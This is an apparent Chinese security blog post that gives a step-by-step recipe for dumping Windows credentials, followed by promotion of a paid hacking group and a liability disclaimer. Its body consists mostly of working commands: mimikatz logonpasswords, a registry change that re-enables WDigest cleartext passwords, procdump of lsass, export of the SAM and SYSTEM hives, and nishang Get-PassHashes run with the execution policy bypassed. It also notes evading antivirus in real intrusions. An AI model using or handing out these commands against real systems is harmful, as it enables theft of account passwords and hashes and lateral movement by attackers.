Windows获取hash常见手法
2024-1-7 22:34:46 Author: 渗透安全团队(查看原文) 阅读量:41 收藏

有师傅反应之前的文章有点太长篇大论 太干,故今日麋鹿换一些风格的文章,写一些简单的,希望能帮到大家,尤其是刚入门的师傅们!

一 猕猴桃mimikatz

实验环境 win7

适用于Windows 8.1 和 Windows Server 2012 R2 之前

privilege::debug

sekurlsa::logonpasswords

实验环境 win10

Windows 8.1 和 Windows Server 2012 R2 之后,出于安全原因,默认情况下禁用了 WDigest 的明文密码存储

可以读到hash

所有我们要修改注册表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

将 UseLogonCredential 设置为 1 然后重启

Shutdown -r -t 0

再用猕猴桃就可以获取到密码了

privilege::debug
sekurlsa::logonpasswords

或者 管理员打开cmd运行procdump导出dmp

https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

多说一句,lsass.exe这个Windows系统进程,它负责处理与安全策略和登录身份验证相关的任务,功能有用户登录认证,创建访问令牌。下面这条命令的执行结果是创建一个lsass.exe 进程的完整内存转储文件(12.dmp)。

procdump64.exe -accepteula -ma lsass.exe 12.dmp

然后放到猕猴桃的目录

sekurlsa::minidump 12.dmp
sekurlsa::logonpasswords full

二 注册表获取sam文件

从注册表导出

reg save hklm\sam e:\sam.hivereg save hklm\system e:\system.hive

其中hklm 代表 "HKEY_LOCAL_MACHINE",这是注册表的一个主分支。SAM 是其下的一个子分支,存储了与系统安全账户管理相关的信息,如用户账户和密码哈希。

把这两个hive放到猕猴桃目录

lsadump::sam /sam:sam.hive /system:system.hive

实战中,猕猴桃会被杀或者是不允许上传mimikatz,可以把这两个文件拖到自己的机器上读取,如下图我拖本机的密码到虚拟机里一样可以读取。

希望各位读者看完我们的文章以后自己去实践一下,只有学到脑子里的东西才是自己的,如果遇到困难,可以私信加本人微信,与麋鹿师傅一起探讨,炼心之路,就在脚下,我们一起成长。

三 powershell

用原版肯定被杀,有能力的可以做一下免杀

https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1powershell -exec bypass "import-module .\Get-PassHashes.ps1;Get-PassHashes"


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

加入安全交流群

                               

关 注 有 礼

关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

 还在等什么?赶紧点击下方名片关注学习吧!


干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247513773&idx=1&sn=56d0afb57deab60bef5ddf0aa6c3decc&chksm=c09f4c69e21b7a36dbca08e5d7df49d92a09d0dfb1e0cca3f0f1c20d0205360719712b912928&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh